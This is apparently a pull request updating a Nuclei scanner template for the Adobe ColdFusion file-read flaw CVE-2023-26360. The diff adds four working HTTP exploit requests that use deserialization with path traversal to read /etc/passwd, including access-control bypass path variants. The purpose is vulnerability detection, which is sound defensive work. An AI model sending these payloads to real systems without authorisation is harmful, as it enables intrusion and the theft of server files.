### PR TITLE
Adding access control check for CVE-2023-26360

### DIFF
--- a/http/cves/2023/CVE-2023-26360.yaml
+++ b/http/cves/2023/CVE-2023-26360.yaml
@@ -2,7 +2,7 @@ id: CVE-2023-26360
 
 info:
   name: Unauthenticated File Read Adobe ColdFusion
-  author: DhiyaneshDK
+  author: DhiyaneshDK & 7own
   severity: high
   description: |
     Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
@@ -47,20 +47,34 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        _variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d
+        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}
+
+      - |
+        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}
+
+      - |
+        POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}
+
+      - |
+        POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "password="
-          - "encrypted=true"
-          - "adobe"
+          - "<wddxPacket version='1.0'>"
         condition: and
-
-      - type: word
-        part: header
-        words:
-          - "text/html"
-# digest: 4a0a0047304502203e2a91f937967b83fa6a96f360b75982090e5fd70018f8fa490700107c6b10970221009dabb92d5e873c0cd1f7e0196504a0d33b8dba91ed6c53786ff9ad72c87b85ee:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b2f5a418a6d735ddc1215777aa23dc0f43b3d6bafb3af2f8eaf1168a3487d77a02207f2bed709ce4a8afe24ba894e7d9d2b0cb03ad8f100f6ee3c61c699244385acd:bb6dd87dab2525c6176b53b553f856ea


### PR DESCRIPTION
### Template / PR Information

Sometime the CVE-2023-44352 could not be exploited as is and require additional access control bypass.
With the provided template's update, if the instance is vulnerable to CVE-2023-29298 and/or CVE-2023-38205, the CVE-2023-44352 could be exploited so it should be raised to the end user.

- Updated CVE-2023-26360
- References:
https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)